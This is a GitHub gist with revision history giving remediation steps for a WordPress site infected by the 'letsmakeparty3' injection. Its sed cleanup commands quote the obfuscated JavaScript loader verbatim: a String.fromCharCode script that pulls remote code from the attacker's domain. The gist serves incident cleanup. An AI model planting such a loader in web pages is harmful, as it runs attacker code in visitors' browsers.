Last active
December 12, 2020 18:33
-
-
Save fabmars/b5150358da81265e9d94bd9fbd6382c7 to your computer and use it in GitHub Desktop.
Revisions
-
fabmars revised this gist
Jul 16, 2020 . No changes.There are no files selected for viewing
-
Jul 16, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -15,7 +15,7 @@ and check rights are back to 644 (probably 604 though) on those files 4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/ 5) change password in the DB: `SET PASSWORD = PASSWORD('mynewpassword');` and put the same password in wp-config.php too of course. 6) update <prefix>_options table and reset 'siteurl' and 'home' props to the original site's url (eg: https://www.mywordpressdomain.com ) as they certainly also contain a link to the malicious site -
Jul 16, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,5 @@ A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b Here's a how-to restore the site functionality (but not plug the hole wherever it is) 1) download all files via ftp under a *unix* system to preserve the rigths as much as possible. I wouldn't do this from Windows but if you're commpelled to, at least download the files in binary mode to preserve line returns. -
Jul 16, 2020 . 1 changed file with 3 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -21,8 +21,8 @@ and check rights are back to 644 (probably 604 though) on those files 7) Now you can access your WP again. Log in the wp admin console and change your password 8) Remove woocommerce and all unneeded plugins 9) Remove ability to post comments 10) Now let's find out how the joker entered the place...TBC -
Jul 16, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -10,7 +10,7 @@ find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> El find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g" 3) upload files overwriting if size is different (available upload setting in FileZilla) and check rights are back to 644 (probably 604 though) on those files 4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/ -
Jul 16, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -15,7 +15,7 @@ and check rights are back to 644 (probably 604 though) on those files 4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/ 5) change password in the DB: `SET PASSWORD = PASSWORD('mynewpassword');` qnd put the same password in wp-config.php too of course. 6) update <prefix>_options table and reset 'siteurl' and 'home' props to the original site's url (eg: https://www.mywordpressdomain.com ) as they certainly also contain a link to the malicious site -
Jul 16, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,7 +1,7 @@ A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b Here's a how-to restore the site functionality (but not plug the hole wherebver it is) 1) download all files via ftp under a *unix* system to preserve the rigths as much as possible. I wouldn't do this from Windows but if you're commpelled to, at least download the files in binary mode to preserve line returns. 2) fix altered files find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g' -
Jul 16, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -17,7 +17,7 @@ and check rights are back to 644 (probably 604 though) on those files 5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword'); 6) update <prefix>_options table and reset 'siteurl' and 'home' props to the original site's url (eg: https://www.mywordpressdomain.com ) as they certainly also contain a link to the malicious site 7) Now you can access your WP again. Log in the wp admin console and change your password -
Jul 16, 2020 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -17,7 +17,7 @@ and check rights are back to 644 (probably 604 though) on those files 5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword'); 6) update <prefix>_options table and reset 'siteurl' and 'home' props as they certainly also contain a link to the malicious site 7) Now you can access your WP again. Log in the wp admin console and change your password -
Jul 16, 2020 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,7 +1,7 @@ A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b Here's a how-to restore the site functionality (but not plug the hole wherebver it is) 1) download all files via ftp under a *unix* system to preserve the rigths as much as possible 2) fix altered files find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g' @@ -25,4 +25,4 @@ and check rights are back to 644 (probably 604 though) on those files 8) Remove ability to post comments 9) Now let's find out how the joker entered the place...TBC -
Jul 16, 2020 . 1 changed file with 19 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,3 +1,6 @@ A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b Here's a how-to restore the site functionality (but not plug the hole wherebver it is) 1) download all files 2) fix altered files @@ -7,4 +10,19 @@ find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> El find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g" 3) upload files overwriting if size is different (available setting in FZ) and check rights are back to 644 (probably 604 though) on those files 4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/ 5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword'); 6) update <prefix>_options table and reset siteurl and home as they certainly also contain a link to the malicious site 7) Now you can access your WP again. Log in the wp admin console and change your password 7) Remove woocommerce and all unneeded plugins 8) Remove ability to post comments 9) Now let's find out how the joken entered the place -
Jul 16, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,10 @@ 1) download all files 2) fix altered files find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g' find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();</script>++g" find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g" 3) upload files overwriting if size is different (available setting in FZ)